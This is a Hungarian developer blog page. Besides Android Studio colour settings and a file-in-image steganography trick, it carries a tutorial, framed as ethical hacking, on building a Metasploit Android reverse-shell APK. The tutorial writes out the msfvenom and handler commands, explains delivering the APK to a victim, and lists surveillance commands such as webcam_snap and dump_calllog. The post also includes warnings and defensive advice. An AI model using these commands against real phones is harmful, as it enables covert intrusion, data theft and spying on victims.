Android Programjaim

Android, Flutter/Dart, Kotlin, Java, Unity, HarmonyOS

Android Studio Eclipse style Logcat/Code editor colors

2015. szeptember 05. 09:56 - lacas8282

Nezzuk, hogyan lesz Eclipse szinu/stilusu az editorunk AS alatt:

Eclipse style code editor:

https://dl.dropboxusercontent.com/u/576705/blog/src/eclipse.xml

A filet masoljuk be a desktop/user/Android Studio XX/config/colors mappaba.
Restart AS, es File/Settings/Colors&Fonts/Scheme-nel kivalasztjuk Eclipse-t

Disable spell checking

http://stackoverflow.com/questions/717849/disable-spell-checking-on-intellij-idea

Betutipusok

Consolas 12 es 1.1 line spacing mindenhol

Keyword bold

Settings/Color&Fonts/Java Keyword -> bold

Find Eclipse Logcat style

You can find the Eclipse Logcat color setting in the follow foottrace in preferences:

Android ==> LogCat ==> Colors

In case you have already deleted Eclipse or didn't bother to open it, here is the RGB color of each log levels:

Verbose:  000000
Debug: 00007F
Info: 027F00
Warn: FF7F00
Error: FF0000
Assert: FF0000
komment

Android exploit-ok. Egy kis ETIKUS hackerkedes - szigoruan tanulasi cellal!

2015. augusztus 23. 10:39 - lacas8282

Nezzuk meg az alabbi kis videot, ahol azt targyaljak, hogy van 1-2 exploit androidban, amit meg mindig ki lehet hasznalni. Ezaltal gyakorlatilag (egy telepitett apk file utan) az egesz rendszerhez hozzafer a Hacker. Mivl ez egy defconos video igy nem illegalis.

Es akkor nezzuk konkretabban hogyan csinaljak: MetaSploit nevu kis cuccot hasznaljuk erre a celra, ami Kali Linux alatt van, es azt a celt szolgalja, hogy minel jobban le tudd tesztelni a rendszert.
Ehhez fogunk hasznalni par dolgot:

- Oracle VirtualBox
- Kali Linux 1.1 vagy 2.0 (en 1.1-et hasznaltam)
- sajat androidos telefon vagy egy VM-es ISO android-al

Meg fogjuk hackelni a sajat telefonunkat, a sajat halozatunkon!!! Az osszes informaciot a youtube-rol szedtem enis, aki angolul tud az konnyen atlathatja jobban a dolgot.
Telepitjuk VB-t, vagy ezek utan letoltjuk a szukseges ISO-kat, felrakjuk Kali Linuxot VirtualBoxra.
Elinditjuk a Kalit. (Live mod), majd nyitunk egy terminalt.

Mostmar a metasploit-ot fogjuk hasznalni!

A terminalba irjuk a kovetkezoket:

msfvenom -p android/meterpreter/reverse_tcp LHOST=[SAJAT IP-d] LPORT=[AKARMILYEN PORT] R > app.apk

Es ennyi gyakorlatilag, ez a kliens resze mondhatni.
Nezzuk a lenyeges reszeket, ami ezutan kovetkezik..

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST [SAJAT IP-d]

set LPORT [AKARMILYEN PORT]

exploit

[*] Started reverse handler on 192.168.0.*:4444
[*] Starting the payload handler...

General egy app.apk filet, amit a gyanutlan user ha elindit, akkor latszolag semmi sem tortenik...(olyan, mintha el sem indult volna, de amint elindul, kihasznalja az exploitot)
Ezt az apk filet a hacker eljuttatja az aldozatnak es kesz is a baj. Megvarja, mig lefuttatja az apk-t...

Az elso parancs elinditja a metasploit console-jat. A kovetkezoben megmondjuk, hogy egy multi handler-t akarunk hasznalni. Beallitjuk a payload-ot, ami ugyanaz, mint az elso sorban volt ugye. (reverse_tcp payload)
Majd beallitjuk a sajat IP-nk, es PORT-unkat, hiszen majd a kliens ide fogja kuldeni az adatokat erre a portra. Ez egy sima socket kapcsolat. A metasploit erre a celra irt szerver reszet nem latom, ezert nem tudom megmondnai, hogy tenylegesen mit csinal. Az apk-t visszafejtve arra jutottam, hogy gyakorlailag egy sima connectiont hoz letre a megadott adatokkal (itteni ip, port) majd finish-el az app, stb. Ilyenkor aktivalodik a session gyakorlatilag magaban a metasploit-ban, azaz kapjuk a kovetkezo dolgokat a Terminalban:

[*] Sending stage (40248 bytes) to 192.168.0.*
[*] Meterpreter session 1 opened (192.168.0.*:4444 -> 192.168.0.28:59439) at yyyy-mm-dd...

Ok.

Sajat IP-t a Kali Linux terminalban ifconfig parancssal kapjuk meg.

A sessiont a hacker megszerezte, azaz elerheti a telefonod.
Lassuk miket tud elerni a metasploit terminalon keresztul:

cd
cat
mkdir
ls
rm
rmdir

upload
download

dump_calllog

sysinfo

webcam_snap
webcam_stream

Gyakorlatilag azert sokkal tobb dolgot, de most csak ennyit masoltam be. Vicces, hogy egy exploitot kihasznalva a hacker akarmit megtehet az android mobilunkkal..

Le tudja tolteni a filejainak, feltolteni tud dolgokat, a webkamerarol realtime kepet es stream-et tud lementeni, ugy hogy a telefon be sincs kapcsolva!!!! Szerencsere azert exploitokat talalni eleg nehez es maceras.

ES VEGUL: A LEIRTAK SZIGORUAN OKTATASI JELLEGGEL TORTENTEK, HOGY LASSUK ILYEN IS VAN, NEM VALLALOK FELELOSSEGET ERTE, HA KIPROBALOD. IGAZ EZ ITT CSAK MAGANHALOZATON MUKODIK, TEHAT MASIK IP-VEL NEM.

Es vegul, a fenti hack modszer hibai:

1, A Szerver listenert le kell futtatni a metasploitban, kali linuxon, es varni ameddig az aldozat el nem inditja az android appot.
2, Az android egy csodas dolog, igy maga az OP rendszer kilovi egy ido utan az apk-t, igy a kapcsolat megszakad. Visszafejtve az apk-t arra a megallapitasra jutottam, hogy minimum egy foregroundService-el kellett volna megirni jol.
3, A kapcsolat barmikor megszakadhat, mondjuk eleg hozza egy net szakadas.
4, A fenti generalt .apk tehat rosszul van megirva, illetve a metasploit ezen resze is rosszul van megirva.
5, Ha a kapcsolat megszakadt, akkor ujra exploit-ot kell futtatnunk a terminalban, mivel ekkor mar a szerver listener sem fog futni...
6. Ez a metasploit cucc tenyleg csak tesztelesre jo.
7, A help-el megkapott parameterek kozul nem mindegyik jo.
8, Nem probaltam ugyan, de elvileg 5.0-ban nem mukodik. (Talan patch van ra?)

Vegezetul #2:
1, Sose hasznalj olyan apk-t vagy alkalmazast, amirol nem tudod, hogy megbizhato a tartalma. Erre az sem garancia, hogy Google Play-ben fent van! En pl. ezert is fejtettem vissza ezt a metasploit altal generalt apk-t, mert nem biztam bennuk.
2, Ha mar etikus hackelgetnel, akkor sajat magad altal irt dologgal tedd, mert abbol legalabb tanulsz is, es tudod mi van a kodban.
3, A hackerkedes tanulasra jo, mason elkovetni BUNCSELEKMENY!

Bovebben tobb hack tema

komment

Szteganográfia - adat elrejtese kepben Windowsban egyszeruen

2015. augusztus 22. 20:25 - lacas8282

Egy viszonylag egyszerubb dolgot fogok megmutatni, gondolom azert mar sokan irmertek :)

rejtsunk el adatokat egy kepben...

No de hogyan?

Az elrejtendo adatot csomagoljuk be winrar-al rar-ba, illetve ugye van a kepunk.

nyissunk egy dos parancssor-t, majd:

copy /b a_kep.png + elrejtendo_adat.rar a_kep2.png

Windows-ban ezek utan a kep miniaturje ugyanugy lathato lesz, mintha egy kep lenne, hiszen az is! Hogyan erjuk el a rejtett tartalmat? Jobb klikk a file-on es: megnyitas winrar-al! Tadam!

komment
Címkék: szteganográfia
süti beállítások módosítása